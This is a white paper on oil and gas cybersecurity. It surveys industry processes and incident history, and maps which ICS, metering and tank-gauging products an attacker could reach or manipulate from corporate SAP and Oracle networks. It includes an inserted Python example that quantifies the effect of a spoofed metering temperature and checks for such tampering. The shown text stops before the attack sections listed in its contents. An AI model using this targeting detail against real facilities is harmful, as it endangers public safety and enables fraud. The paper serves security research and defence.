Oil and Gas Cyber Security From SAP To ICS


White Paper

Alexander Polyakov
Mathieu Geli

www.erpscan.com
Contents
Disclaimer
1. Intro
2. Oil and Gas Cybersecurity
  2.1. Oil and Gas Cybersecurity history
Oil and Gas 101
  Upstream processes
  Midstream
  Downstream
  Main Processes
    Extraction (Drilling)
    Gathering
    Separation
  Enterprise Applications in Oil and Gas
    SAP in Oil and Gas
    Oracle in Oil and Gas
Attacking Oil and Gas
  Oracle EAM
  SAP HANA
  SAP Manufacturing Integration and Intelligence
    Getting admin rights on the NetWeaver platform
    Getting OS rights on the MII server
  Disclosing data from industrial process
  Modifying data
  Faking data
Conclusion
References
Additional reading
About ERPScan
  Research Team
  Our Contacts
    Products
    Services

Disclaimer
The partnership agreement and relationship between ERPScan and SAP prevents us from publishing
the detailed information about vulnerabilities before SAP releases a patch. This review will only include
the details of those vulnerabilities that we have the right to publish as of the release date. However,
additional examples of exploitation that prove the existence of the vulnerabilities are available in
conference demos as well as at ERPScan.com.

Our SAP security surveys and research in other areas of SAP security do not end with this whitepaper.
You can find the latest updates about the statistics of SAP services found on the Internet and other
endeavors of the EAS-SEC project.

This document or any part of it cannot be reproduced in whole or in part without prior written
permission of ERPScan. SAP SE is neither the author nor the publisher of this whitepaper and is
not responsible for its content. ERPScan is not responsible for any damage that can be incurred by
attempting to test the vulnerabilities described here. This publication contains references to SAP SE
products. SAP NetWeaver and other SAP products and services mentioned herein are trademarks or
registered trademarks of SAP SE in Germany.

1. Intro
The idea is simple. We want to show that mission-critical business applications are usually connected to each other by different types of integration technologies. More importantly, enterprise applications located in the corporate network usually have connections to devices in the OT network, and there is no easy way to separate them.

If you have plant devices that collect data about oil volume, for example, you must somehow transfer that data to the corporate network to display it on dashboards. That is why, even if you have a firewall between IT and OT, some applications on either side remain connected, and that is why it is possible to conduct an attack and pivot from the IT network (or even the Internet) into the OT network, down to field devices and smart meters.

What else?
• It is the first research of its kind on Oil and Gas cybersecurity.
• There are still more questions than answers in this area. More detailed research requires unique equipment; however, much of the relevant software and hardware is relatively easy to find.

This is just a beginning. Our goal was not to prepare a comprehensive encyclopedia of Oil and Gas cybersecurity but to lay the basis for further research (which we hope the community will conduct) and to show that all the issues in technology networks that we have already discovered (and that you will discover) can be exploited from the corporate network. We welcome everybody to continue this research.

Who should read this white paper and why?

• Researchers – Oil and Gas cybersecurity is a small universe that is almost unexplored. If you have ever thought about doing something in this area, here is your chance to spend two hours instead of two months: after reading this paper, you will know what to do to carry out your own research.
• Pentesters – you will learn how to break into the most critical network and how to impress decision makers during your pentests. Instead of "Hey, we have access to your domain controller" you will be able to say something like "Hey, I can change the gas pressure in your storage. Isn't that critical enough?"
• CISOs – There is bad news, unfortunately. You will learn that there is no air gap between your enterprise network and, for example, an oil refinery. The truth is that attackers can pivot into your production systems from the corporate network or even from the Internet. This paper will help you understand how to prevent it.
• SAP and Oracle admins – You are partly responsible for the security of very important OT processes. SAP and Oracle systems have connections with most of those systems in one way or another. This white paper will highlight what exactly can go wrong.

Why Oil and Gas?

We have chosen the Oil and Gas sector for two reasons:

• We have experience and understanding of the processes, as we have seen them in real environments, and we can prove that these attack vectors work (we demonstrated them during customer engagements).
• Oil, gas, and other natural resources are not easy to measure. It is possible to spoof the data in a way that nobody will be able to investigate.

Compare this with the retail industry. You know how many pairs of Nike shoes are stored in your warehouse, and even if somebody obtains access to it, steals shoes and then changes their quantity in the ERP system, sooner or later somebody will notice that something is wrong. When dealing with natural resources, nobody knows the real quantity. It is calculated from a number of metrics such as pressure, temperature, and so on. According to the descriptions of some popular technologies that optimize the hydrocarbon supply chain, hydrocarbon volumes fluctuate depending on environmental temperature and pressure conditions. As product valuation needs quantity and mass, and simple weighing is not possible, one has to derive them from volumes measured at ambient temperature and pressure, which requires complex conversion calculations of the observed volumes at each custody transfer point. Imagine what can happen if an attacker accesses and modifies this data.

2. Oil and Gas Cybersecurity
Industrial automation and control systems such as SCADA (supervisory control and data acquisition), DCS (Distributed Control Systems), PLCs (Programmable Logic Controllers), OPC servers, field devices, and other critical components are often referred to as Operational Technology (OT).

OT is used to monitor and control physical processes in the oil and gas industry. The role of OT is the acquisition of data coming from the process (temperatures, pressures, valve positions, tank levels, human operator input) and the direct control of electric, mechanical, hydraulic or pneumatic actuators.

In the good old days, most OT networks were air-gapped from the business (office) network and the Internet and operated independently using proprietary hardware, software and communications protocols. However, in recent years, demand for business insight, requirements for remote network access and the spread of commodity hardware and traditional IT software (e.g., TCP/IP networking, Windows-based platforms) have caused many oil and gas companies to integrate their control systems with their enterprise IT systems, and some of them even provide access to the OT network from the cloud.

Cybercrime costs energy and utility companies an average of $13.2 million a year each in lost business and damaged equipment, higher than in any other industry, according to a Ponemon survey of 257 businesses. [1]

2.1. Oil and Gas Cybersecurity history
December 2002 – Venezuela's state oil company was hit by a strike. There were also instances of computer hacking that caused significant damage, since many operations are centrally controlled by PCs. Someone, possibly an employee involved in the general strike, remotely accessed a programming terminal and erased all PLC programs at a port facility. This and other physical sabotage cut Venezuela's national production down to 370,000 barrels per day, compared with 3 million barrels before the strike.

2008 – Hackers interfered with the alarms and communications of the Baku-Tbilisi-Ceyhan pipeline in Turkey, super-pressurizing crude oil to cause an explosion that resulted in the spilling of more than 30,000 barrels of oil.

23 October 2009 – An explosion occurred in Bayamon, Puerto Rico. The fire blazed for three days, burning down houses, producing black clouds of gasoline-fueled smoke and forcing residents to flee their homes. Investigators attributed it to a glitch in the facility's computerized monitoring system: a storage tank was being refilled with gasoline from a fuel ship docked in San Juan harbor, and because the tank's meter malfunctioned, the petrol kept overflowing until it met an ignition source. [2]

2010 – Stuxnet was used to hijack industrial control systems around the globe, including computers used to manage oil refineries, gas pipelines, and power plants. Although Stuxnet was not designed to affect the Oil and Gas industry, it seriously affected these companies as well.

2012 – As a result of a cyber attack on Saudi Aramco, the Saudi Arabian national petroleum and natural gas company, 30,000 computers were damaged. The attack aimed to stop gas and oil production in Saudi Arabia and prevent resource flow to international markets.

10 September 2012 – Telvent, a supplier of remote administration and monitoring tools to the energy sector, became the victim of a sophisticated advanced persistent threat. On September 10, the Canadian branch discovered that its internal firewall and security systems had been breached, and it warned its customers about the incident.

According to Telvent, every energy company in the Fortune 100 relies on its systems. Telvent solutions manage more than 60 percent of the total hydrocarbon movements in North American and Latin American pipelines.

The attacker appeared to be a Chinese hacking group. The malware names and network components
used in the attack have been used in the past by a Chinese cyber-group called the “Comment Group,”
according to Dell SecureWorks. Comment Group targeted a variety of organizations, including chemical
and electric companies as well as other industrial sectors.

After breaching the network and installing malware, the attackers stole project files related to the
OASyS SCADA product, a remote administration tool. OASyS allows companies to combine older IT
equipment with modern “smart grid” technologies.

The attackers may have wanted the code in order to find vulnerabilities in the software to launch future
attacks against other energy companies directly. [3]

August 2014 – Hackers launch an all-out assault on the Norwegian Oil and Gas industry

Hackers targeted about 300 different firms within the country's oil and energy industries. The attacks were revealed in August 2014 by the Nasjonal Sikkerhetsmyndighet (National Security Authority of Norway), which had been tipped off to the attacks by "international contacts". The NSM named 50 companies that were identified as having been attacked and another 250 that may have been targeted and that received warning letters from the agency.

During this attack, seemingly legitimate emails with attachments were sent to people in important roles at the companies. When the targeted employee opened the attachment, a malicious program was installed that checked the system for security holes.

The goal of this attack was to plant a Trojan or a virus on the machine. The first-stage program just sets up contact and allows the attacker, sitting outside, to download further damaging code. [4]

January 2015 – A device used to monitor gasoline levels at refueling stations across the United States, known as an automated tank gauge (ATG), could be remotely accessed by online attackers, manipulated to cause alerts, and even set to shut down the flow of fuel, according to the research. Several Guardian AST gas-tank-monitoring systems have suffered electronic attacks, possibly instigated by hacktivist groups. Successful attacks can affect inventory control, data gathering, and delivery tracking, in turn affecting the availability of gasoline at local stations. [5]

Today's cyber security threats have gone far beyond simple virus spreading, computer or data damage, or theft, and have acquired the capability to change process plant operations, for example:

• Increasing/decreasing pressure in a pipeline;
• Changing field device parameter settings;
• Closing/opening a motorized valve;
• Causing a Denial of Service (DoS) within the ICS;
• Increasing/decreasing motor speed;
• Displaying fake process diagrams and alarms on the operators' Human Machine Interfaces (HMI), SCADA/MES, ERP systems, and other applications.

Oil and Gas 101
Oil and Gas processes are usually divided into three separate areas: Upstream, Midstream, and Downstream.

Upstream - The upstream sector includes the searching for potential underground or
underwater crude oil and natural gas fields, drilling of exploratory wells, and subsequently drilling and
operating the wells that recover and bring the crude oil and/or raw natural gas to the surface. The
upstream oil sector is also commonly known as the exploration and production (E&P) sector.

Midstream- The midstream sector involves the transportation (by pipeline, rail, barge, oil tanker or
truck), storage, and wholesale marketing of crude or refined petroleum products. Pipelines and other
transport systems can be used to move crude oil from production sites to refineries and deliver the
various refined products to downstream distributors.

Downstream -The downstream sector commonly refers to the refining of petroleum crude oil and
the processing and purifying of raw natural gas, as well as the marketing and distribution of products
derived from crude oil and natural gas. The downstream sector touches consumers through products
such as gasoline or petrol, kerosene, jet fuel, diesel oil, heating oil, fuel oils, lubricants, waxes, asphalt,
natural gas, and liquefied petroleum gas (LPG) as well as hundreds of petrochemicals. [6]

Upstream processes
The upstream segment of the business is also known as the exploration and production (E&P) sector
which includes activities related to searching for, recovering and producing crude oil and natural gas.

Upstream consists of the following main business processes, which in turn consist of the listed sub-processes:

• Extraction (Drilling)
–– Pump control system, blow-out prevention, flaring, and venting
• Gathering (From earth to separators)
–– Wellhead management system, manifolds management, net oil measurements
• Separation (Separate oil, gas, and water)
–– Multiple separators (2-phase/3-phase), Heaters, Vibration Monitoring System, Compressor Control System, Burner Management Systems, Coalescence, Desalting Management System, Emergency Shutdown System
• Gas Compression (Prepare for storage and transport)
–– Multiple stages
• Temporary Oil Storage (Temporarily store before loading)
–– Tank Inventory System, Tank Gauging System, Movement management system
• Waste Disposal
–– Water disposal
• Metering (Calculate quantity before loading)
–– Fiscal Metering, Liquid Flow Metering, Gas Flow Metering Systems, Wet Gas Metering Systems, Provers & Master Meters

Midstream
The midstream sector involves the transportation (by pipeline, rail, barge, oil tanker or truck), storage,
and wholesale marketing.

Midstream consists of the following main business processes, which in turn consist of the listed sub-processes:

• Terminal Management (Obtain oil from Upstream)
–– Measurement Systems, Movement Automation Systems, Order Movement Management
• Gas Processing (Separate natural gas and NGL)
• Gas Transportation (Transfer gas to storage)
–– Pipeline management system
• Oil Transportation (Transfer oil to storage)
–– Pipeline management system
• Gas Storage (Temporary and long-term)
–– Peak load gas storage, gas storage, LNG storage
• Oil Storage (Long-term oil storage)
–– Tank inventory system, Tank Temperature management, Tank Gauging System, Product Movement System

Downstream
The downstream sector commonly refers to the refining of petroleum crude oil and the processing and
purifying of raw natural gas, as well as the marketing and distribution of products derived from crude
oil and natural gas.

Downstream consists of the following main business processes, which in turn consist of the listed sub-processes:

• Refining (Processing of crude oil)
–– Blend Optimization, Emission Monitoring System
• Oil Petrochemicals (Fabrication of base chemicals and plastics)
–– Too many processes to be listed here
• Gas Distribution (Deliver gas to utilities)
• Oil Wholesale (Deliver petrol to 3rd parties)
–– Loading, Terminal automation
• Oil Retail (Deliver petrol to end users)
–– Truck loading automation, gas-pump monitoring systems, POS

Main Processes
Extraction (Drilling)
Risks: Plant Sabotage/Shutdown, Compliance violation, Equipment damage, Production Disruption, Safety violation

Drilling is physically creating the "borehole" in the ground that will eventually become an oil or gas well. Rig contractors and service companies in the oilfield services business sector do this work.

The drilling process includes at least the following systems:

• Pump control systems
• Blow-out prevention systems
• Flare and vent disposal systems

Extraction as a business process was not covered in this research.

Gathering
Risk: Plant Sabotage/Shutdown, Compliance violation, Equipment damage, Production Disruption, Safety violation

Gathering includes all processes responsible for lifting crude oil from the ground and transferring it to the separators.

Well monitoring systems

Wellheads are situated on the surface of oil or gas wells leading down to the reservoir. A wellhead can also belong to an injection well used to inject water.

Well monitoring systems (WMS) are used to estimate the flow rates of oil, gas, and water from all the individual wells in an oil field. The real-time evaluation is based on data from the available sensors in the wells and flow lines.

Manifolds management

The individual well streams are brought into the main production facilities over a network of gathering pipelines and manifold systems.

Net Oil Measurement

Sometimes oil measurement starts here, just to estimate values.

Invensys Foxboro is one of the solutions that can be used for this purpose. [7]

Separation
Risks: Product Quality, Equipment damage

Oil generally comes out of a well mixed with water and, often, small amounts of natural gas. Similarly, natural gas often comes out of the ground mixed with water vapor and other gases. These components must be separated before "pipeline quality" oil and/or natural gas can be sent to market.

To remove water and natural gas from oil, the mixture is passed through a device called a first-stage or high-pressure (HP) separator, which removes the gas and sends it into a separate line. The remaining oil, gas and water mixture goes into a heater/treater unit. Heating helps to break up the mixture so that the oil separates from the water, which is denser. Any remaining natural gas, being less dense than oil, rises to the top. The gas is removed for either processing or burning; the water is removed and stored for further use.

The second stage is quite similar to the first-stage HP separator. The pressure here is around 10 atmospheres and the temperature is below 100 degrees Celsius. An oil heater may be located between the first- and second-stage separators to reheat the oil/water/gas mixture.

The third separator is a two-phase separator, also called a flash drum, where the pressure is reduced to atmospheric.

A large pressure reduction in a single separator would cause flash vaporisation, leading to instability and safety hazards; the retention period is typically 5 hours. It is also important to prevent gas blow-by, which happens when a low oil level lets gas exit via the oil outlet, causing high pressure downstream.

Burner Management System (BMS)

In the oil and natural gas industry, various facilities (e.g. tanks, line heaters, separators, dehydrators, amine reboilers, etc.) are used in the production and transportation of oil and natural gas. They require heat to function properly, and a burner within the application provides that heat.

Burner Management Systems make oil and gas companies safer, more efficient, and more compliant.

Safety controls on direct-fired heaters have evolved continuously over the recent past, and the evolution has accelerated over the last five years, due to the introduction of government legislation that actively enforces the application of existing codes. Heater designs and quality standards have followed the practice of API 560. For most operating companies this is now mandatory and is used as a minimum standard, with individual companies adding their own requirements.

Many operating companies within North America are implementing BMS in new and existing heaters in accordance with the required guidelines; however, some installations still rely only on manual operator intervention or the plant Emergency Shutdown (ESD) system as the safety control.

Without a BMS, companies face the following problems:

• Workers must discover the extinguished burner and reignite it manually (often with a fuel-soaked rag tied to a stick). This takes time and can be very dangerous.
• No electronic temperature control: the application burns continuously, often needlessly, until the flame fails.
• No safety shutdown: with a BMS, certain application inputs (e.g. high/low pressure, level, etc.) that indicate a potential problem trigger a shutdown.

Most of the major ICS vendors provide BMS solutions.

Examples of BMS systems:

• Invensys BMS [8]
• Emerson DeltaV SIS BMS [9]
• Siemens BMS [10]
• Honeywell BMS [11]

Separators consist of many other sub-processes controlled by the following systems:

• Distributed Control System (DCS). For example, CENTUM CS3000 by Yokogawa.
• Emergency Shutdown System (ESD). For example, Emerson DeltaV SIS™ Emergency Shutdown.
• Compressor Control System (CCS). For example, Triconex TS3000 TMR.
• Vibration Monitoring System (VMS). For example, Bently Nevada 3500.

Waste disposal
Risk: Plant Sabotage/Shutdown, Utilities Interruption, Compliance violation

Water disposal

On an installation where the water cut is high, there will be a huge amount of water produced.
This water should be cleaned before discharge to sea.

Water disposal and related processes were not covered in this research.

Metering
Risks: Product Quality, Monetary loss

Metering is the most important process. It plays an essential role, as both the quality of the final products and the money that changes hands depend on how accurate the metering was. During metering, the systems analyze density, viscosity, water content, temperature, and pressure. Metering usually consists of several runs; each run employs one meter and several instruments for temperature and pressure correction. Gas metering is less accurate than oil metering (about ±1 %). The most important kind of metering is fiscal metering.

Custody Transfer (Fiscal Metering)


Custody Transfer in the oil and gas industry refers to the transactions involving transporting physical
substance from one operator to another. This includes the transferring of raw and refined petroleum
between tanks and tankers, tankers and ships and other transactions. Custody transfer in fluid
measurement is defined as a metering point (location) where the fluid is being measured for sale from
one party to another. During custody transfer, accuracy is of great importance to both the company
delivering the material and the eventual recipient.

The term "fiscal metering" is often used interchangeably with custody transfer, and refers to metering at a point of a commercial transaction, such as when a change in ownership takes place. [12]

Payment is usually made as a function of the amount of fluid or gas transferred, so accuracy is
paramount as even a small error in measurement can add up fast, leading to financial exposure in
custody transfer transactions. For example, Pump Station 2 on the Alaska Pipeline is designed to pump
60,000 gallons per minute (227 cubic meters per minute) of oil. A small error of 0.1% equates to an error
of 2,057 barrels of oil a day. At a spot price of $105 a barrel, that 0.1% error would cost $216,000 a day.
Over a year, the 0.1% error would amount to a difference of $78.8 million. The error could be either on
the high side, benefiting the seller; or on the low side, to the buyer’s benefit.

The engine of a custody transfer or fiscal metering installation is the flow computer. It is the device
that takes the inputs from the measuring devices (flowmeters, pressure sensors, temperature sensors,
density sensors, gas chromatographs, and others) and calculates the amount of liquid or gas that
has been transferred. These calculations are based on a variety of industry standard flow calculation
algorithms. [13]

Metering control software

Data aggregation and management systems provide the complete information needed to gain and maintain control over all aspects of the measurement process. They give a basis for important decisions at all levels, from QMI engineering to top management.

Their predictive-maintenance approach not only reduces unnecessary work, expense and downtime; above all, it eliminates the give-away inherent in previous systems.

Examples of fiscal metering systems:

Data aggregation and management (easy to manipulate values):

• Flow-Cal – FLOWCAL Enterprise (! Internet access)
• KROHNE SynEnergy (! Internet access + SAP access)
• Honeywell Experion® Process Knowledge System (PKS), MeterSuite™
• OPC servers (Kepware, MatrikonOPC) (SAP access)
• Schneider Electric InFusion
• Schneider Electric SCADAPack

Flow computing (hard to manipulate):

• KROHNE Summit 8800
• ABB TotalFlow
• Emerson FloBoss S600 (previously known as Daniel DanPac S600)
• Emerson ROC800
• Schneider Electric RealFlo

Flow meters:

• KROHNE, Vortex, etc.

The most common flow computer is the Emerson FloBoss S600+ (previously known as the Daniel DanPac S600+ secure metering computer). [14]

The FloBoss S600+ Flow Computer is a panel-mounted (indoor) flow computer designed specifically to measure hydrocarbon liquids and gas where versatility and accuracy matter. Its standard features suit fiscal measurement, custody transfer, batch loading, and meter proving applications. The S600+ allows you to configure multi-stream, multi-station applications, enabling you to meter liquids and gases simultaneously. The S600+ can be used either as a stand-alone flow computer or as a component of a larger system. The intelligent I/O modules fit both gas and liquid. Adding I/O modules (up to a maximum of three) allows configuring up to six dual-pulsed streams or up to 10 single-pulsed streams and two headers. The S600+ supports orifice, ultrasonic, turbine, positive displacement, Coriolis, Annubar, and V-Cone® flow meters. [15]
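The introduction warns that hydrocarbon quantity is derived from observed volumes through temperature and pressure conversion, and the list above separates aggregation software that is "easy to manipulate" from flow computers that are "hard to manipulate". The following Python example, written for this edit and not taken from the paper or from any vendor named here, ties those two points together: it shows how many barrels and dollars a 3 °F spoof of a single temperature reading moves on a 100,000 bbl batch, and a reconciliation check that compares what the ERP-facing aggregation layer reports against the flow computer's own batch record. The temperature correction is a simplified crude-oil form of the API MPMS 11.1 calculation as the example's author recalls it (no rounding rules, no pressure correction, no product-specific tables), so treat it as illustrative, not as a certified implementation. The density, batch sizes, tolerances and batch records are constructed sample data; the $105/bbl price is the one the paper uses in its Alaska pipeline calculation.

```python
"""Added example (not from the paper): a small spoof of one sensor reading
propagates into the billed net volume of a custody transfer, and a cross-check
between the flow computer and the data-aggregation layer catches it.

Assumptions (all illustrative, not a certified implementation):
  * ctl() uses the crude-oil form of the API MPMS 11.1 temperature
    correction as the author of this example recalls it
    (alpha60 = K0 / rho60**2, K0 = 341.0957, rho60 in kg/m3, T in deg F);
    rounding rules, the pressure correction (CPL) and product-specific
    tables are left out.
  * Batch records, density, tolerances and the 3 F spoof are constructed data.
"""
import math

K0_CRUDE = 341.0957   # API 11.1 Table 6A constant for generalized crude oils
BASE_TEMP_F = 60.0    # reference temperature of the net standard volume


def alpha60(rho60_kg_m3):
    """Thermal expansion coefficient (per deg F) at the base density."""
    return K0_CRUDE / (rho60_kg_m3 ** 2)


def ctl(temp_f, rho60_kg_m3):
    """Correction for Temperature of the Liquid: observed volume -> 60 F."""
    a = alpha60(rho60_kg_m3)
    dt = temp_f - BASE_TEMP_F
    return math.exp(-a * dt * (1.0 + 0.8 * a * dt))


def net_standard_volume(gross_bbl, temp_f, rho60_kg_m3):
    """Gross observed volume at line temperature -> net volume at 60 F."""
    return gross_bbl * ctl(temp_f, rho60_kg_m3)


def tamper_impact(gross_bbl, true_temp_f, spoofed_temp_f, rho60_kg_m3, usd_per_bbl):
    """Barrels and dollars shifted by spoofing the temperature input alone."""
    honest = net_standard_volume(gross_bbl, true_temp_f, rho60_kg_m3)
    spoofed = net_standard_volume(gross_bbl, spoofed_temp_f, rho60_kg_m3)
    delta_bbl = spoofed - honest
    return delta_bbl, delta_bbl * usd_per_bbl


def reconcile(flow_computer_records, aggregated_records, tol_temp_f=0.5, tol_bbl=1.0):
    """Compare what the ERP/aggregation layer shows against the flow computer's
    own batch records (the 'hard to manipulate' source of truth).
    Returns (batch, reason) pairs for every divergence beyond tolerance."""
    findings = []
    by_batch = {r["batch"]: r for r in flow_computer_records}
    for agg in aggregated_records:
        ref = by_batch.get(agg["batch"])
        if ref is None:
            findings.append((agg["batch"], "no flow computer record"))
            continue
        if abs(agg["temp_f"] - ref["temp_f"]) > tol_temp_f:
            findings.append((agg["batch"], "temperature mismatch"))
        if abs(agg["net_bbl"] - ref["net_bbl"]) > tol_bbl:
            findings.append((agg["batch"], "net volume mismatch"))
    return findings


def demo():
    """Constructed scenario: batch B1's temperature is lowered by 3 F on the
    way to the ERP (less apparent shrinkage, so more barrels are billed);
    batch B2 is reported honestly."""
    rho60 = 850.0          # kg/m3, a medium crude (constructed)
    gross = 100_000.0      # bbl per batch (constructed)
    price = 105.0          # USD/bbl spot price used by the paper
    fc = [   # what the flow computer recorded
        {"batch": "B1", "temp_f": 80.0, "net_bbl": net_standard_volume(gross, 80.0, rho60)},
        {"batch": "B2", "temp_f": 75.0, "net_bbl": net_standard_volume(gross, 75.0, rho60)},
    ]
    agg = [  # what the aggregation layer handed to the ERP
        {"batch": "B1", "temp_f": 77.0, "net_bbl": net_standard_volume(gross, 77.0, rho60)},
        {"batch": "B2", "temp_f": 75.0, "net_bbl": net_standard_volume(gross, 75.0, rho60)},
    ]
    delta_bbl, delta_usd = tamper_impact(gross, 80.0, 77.0, rho60, price)
    return delta_bbl, delta_usd, reconcile(fc, agg)


if __name__ == "__main__":
    bbl, usd, findings = demo()
    print(f"3 F spoof on a 100,000 bbl batch: {bbl:+.1f} bbl, {usd:+,.0f} USD")
    for batch, reason in findings:
        print(f"batch {batch}: {reason}")
```

A three-degree shift on one batch moves roughly 140 bbl, about $15,000 at the paper's price, and nothing in the ERP record looks anomalous on its own. The practical control is `reconcile()`: pull the batch totals from the flow computer over its own interface rather than trusting the aggregation layer's copy, and alert on any batch whose temperature or net volume diverges beyond the metering tolerance.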

Terminal Management
Risks: Plant Sabotage/Shutdown, Equipment damage, Production Disruption (stop or pause production), Product Quality (bad oil and gas quality), Compliance violation (pollution), Safety violation (death or injury)

The next stage is to transfer oil from Upstream to Midstream through special terminals. Terminal management usually consists of the following systems; sometimes the functionality of these systems is combined in one solution.

• Movement Automation Systems (MAS)
• Order Movement Management (OMM)

Gas Processing
Risks: Plant Sabotage/Shutdown, Equipment damage, Production Disruption (Stop or pause
production), Product Quality (bad oil and gas quality), Compliance violation (Pollution), Safety
violation (Death or injury)

Major transportation pipelines usually impose restrictions on the make-up of the natural gas that is allowed into the pipeline. Before the natural gas can be transported, it must be purified: ethane, propane, butane, and pentanes must be removed from it, but that does not mean they are all "waste products".

In fact, these associated hydrocarbons, known as natural gas liquids (NGLs), can be very valuable by-products of natural gas processing. NGLs consist of ethane, propane, butane, iso-butane, and natural gasoline. The complete processing of natural gas takes place at a processing plant, usually located in a natural gas producing region. The extracted natural gas is transported to these processing plants through a network of gathering pipelines, which are small-diameter, low-pressure pipes. A complex gathering system may consist of thousands of miles of pipes, interconnecting the processing plant with upwards of 100 wells in the area.

Gas Processing was not covered in this research.

Gas Transportation
Risks: Plant Sabotage/Shutdown, Equipment damage, Production Disruption (Stop or pause
production), Product Quality (bad oil and gas quality), Undetected Spills, Compliance violation
(Pollution), Safety violation (Death or injury)

A significant part of the data received by a control station is provided by supervisory control and data
acquisition (SCADA) systems. These systems are essentially sophisticated communications systems
that take measurements, collect data along the pipeline (usually in metering or compressor stations
and valves), and transmit the data to the centralized control station. Flow rate through the pipeline,
operational status, pressure, and temperature readings can be used to assess the status of the pipeline
at any one time. These systems also work in real time, so there is little lag between taking
measurements along the pipeline and transmitting them to the control station. Equipment status
scans are taken every 6-90 seconds depending on the communication technology used in the field
(NPC 2001).

This information allows pipeline engineers to know exactly what is happening along the pipeline at all
times, which permits quick reactions to equipment malfunctions, leaks, or any other unusual activity
along the pipeline, as well as monitoring load control. Some SCADA systems also incorporate the
ability to operate certain equipment along the pipeline remotely, including compressor stations,
which allows engineers in a centralized control center to adjust flow rates in the pipeline immediately
and easily.

SCADA systems can also operate on cell phone technology, such as the Cellular Digital Packet Data
network, which does not require lines or other infrastructure such as an antenna tower. Some SCADA
systems operate directly through the Internet, eliminating certain maintenance concerns for the
operator and adding new risks.

Gas Transportation processes were not covered in this research.

Oil Transportation
Risks: Plant Sabotage/Shutdown, Equipment damage, Production Disruption (Stop or pause
production), Product Quality (bad oil and gas quality), Undetected Spills, Illegal tapping, Compliance
violation (Pollution), Safety violation (Death or injury)

Oil transportation is the process of tracking crude oil and products via pipelines. Oil transportation
solutions accurately track incoming and outgoing movements via pipelines down to the terminals,
enabling more accurate crude unit scheduling.

Oil transportation processes were not covered in this research.

Base load Gas Storage
Risks: Plant Sabotage/Shutdown, Equipment damage, Compliance violation (Pollution), Safety
violation (Death or injury)

Natural gas in storage facilities is managed in two ways: meeting base load requirements
and meeting peak load requirements.

Natural gas storage is required for two reasons: meeting seasonal demand requirements and as
insurance against unexpected supply disruptions. Base load storage capacity is used to meet seasonal
demand increases. Base load facilities are capable of holding enough natural gas to satisfy long-term
seasonal demand requirements. Typically, the turn-over rate for natural gas in these facilities is a year;
natural gas is generally injected during the summer (non-heating season), and withdrawn during the
winter (heating season), usually from November to March. These reservoirs are larger, but their delivery
rates are relatively low, meaning the natural gas that can be extracted each day is limited. Instead,
these facilities provide a prolonged, steady supply of natural gas. Depleted gas reservoirs are the most
common type of base load storage facility.

Base load Gas storage processes were not covered in this research.

Peak load Gas Storage
Risks: Plant Sabotage/Shutdown, Equipment damage, Compliance violation (Pollution), Safety
violation (Death or injury)

Peak load storage facilities are designed to have high deliverability for short periods, meaning natural gas can
be withdrawn from storage quickly when the need arises. Peak load facilities are intended to meet
sudden, short-term demand increases. These facilities cannot hold as much natural gas as base load
facilities; however, they can deliver smaller amounts of gas more quickly, and can also be replenished
in a shorter amount of time than base load facilities. While base load facilities have long-term injection
and withdrawal seasons, turning over the natural gas in the facility about once per year, peak load
facilities can have turnover rates as short as a few days or weeks. Salt caverns are the most common
type of peak load storage, although aquifers may be used to meet these demands as well.

Peak load Gas storage processes were not covered in this research.

LNG Storage
Risks: Plant Sabotage/Shutdown, Equipment damage, Compliance violation (Pollution), Safety
violation (Death or injury)

The LNG storage facility liquefies natural gas by cooling it to -160 degrees centigrade and stores it in
liquid form. The main feature is its location and ability to rapidly revaporise the natural gas, and deliver
it to the National Transmission System (NTS).

As a result, LNG storage is able to provide a peak gas supply to shippers and supplement NGG's
network capacity. In addition, LNG storage is used as a contingency against the risk of emergencies
such as system constraints, failures in supply or failures of end-user interruption.

LNG Gas storage processes were not covered in this research.

Oil Storage
Risks: Plant Sabotage/Shutdown, Equipment damage, Production Disruption, Compliance violation,
Safety violation

Oil is stored in storage tanks. A storage location usually consists of 10-100+ tanks holding 1-50m barrels. To
manage these tanks, companies use Tank Inventory systems. A Tank Inventory System collects data from
special tank gauging systems (such as level, pressure or float radars that are used to measure the level
in storage tanks) and also stores records of volumes and history.

Monitoring the levels in offsite storage tanks of flammable materials can significantly reduce the
likelihood of initiating events that could have a potential impact not only on the operation but also on
safety and the environment. Tank level deviations can result in accidents such as a tank overfilling,
liquefied gas flashing through a pressure safety valve header, a floating roof mechanical damage, or an
extraction pump running dry. The high severity of the consequences for safety and the environment is
exacerbated by the large inventories of hazardous materials involved. As more operations are pressed
to make improvements in their tank farm and terminal operations management systems, the following
offers an overview of best practices for complying with the HSE recommendations while reducing
costs and driving more value from the operation.

Here is the list of the most common solutions for Oil and Gas:

• Systems connected with IT
–– Enraf TM BOX
–– Honeywell's Experion® Process Knowledge System (PKS) (For Terminals)
• Tank Inventory Systems (single-window interface for Tank Gauging Systems)
–– Emerson Rosemount TankMaster WinOpi
–– Schneider-electric SimSci™
–– Honeywell Enraf Entis Pro
–– MHT VTW
• Tank Gauging Systems
–– Emerson TankMaster Server
–– Honeywell Enraf BPM
–– Saab, Varec, GSI, MTS, L&J…
• Meter Management
–– ControlLogic PLC
–– SmartView
• Meters/Gauges
–– SmartRadar FlexLine
–– ABB
–– Honeywell VIT
–– Enraf 854 ATG Servo Advanced Tank Level Gauge

Management consoles of Tank Inventory systems do not just read the data. Some of them (for example,
Emerson Rosemount TankMaster WinOpi) can also control Tank Gauging software and hardware.
If an attacker gets unauthorized access to control commands, he can change any alarm (Level,
Temperature, and Pressure) for tanks configured as servo tanks or send Freeze and Lock commands to
a servo gauge.

Refinery
Risks: Plant Sabotage/Shutdown, Equipment damage, Product Quality, Production Disruption,
Compliance violation, Safety violation

The job of the refinery is to sort and improve the hydrocarbons within the crude. Gasoline, propane,
jet fuel, heating oil, and petrochemicals are just some of the specially formulated products leaving the
refinery. Technicians in a central control room can fine-tune refinery operations to produce the desired
mix of products.

An oil refinery, or petroleum refinery, is an industrial process plant where crude oil is processed and
refined into petroleum naphtha, gasoline, diesel fuel, asphalt base, heating oil, kerosene and liquefied
petroleum gas.

Oil refineries are typically large, sprawling industrial complexes with extensive piping running
throughout, carrying streams of fluids between large chemical processing units.

In many ways, oil refineries use much of the same technology as, and can be thought of as a type of, chemical
plant. [16]

Refinery solutions are the following:

• Solutions for high-level overview and decision-making
–– Emerson DeltaV, OSISoft PI (Advanced Metering Infrastructure)
• Management solutions
–– Siemens Simatic SCADA (lots of vulnerabilities)
–– Experion PKS SCADA
–– Modcon SCADA
–– Ignition SCADA
–– Schneider-electric SimSci™
• Devices
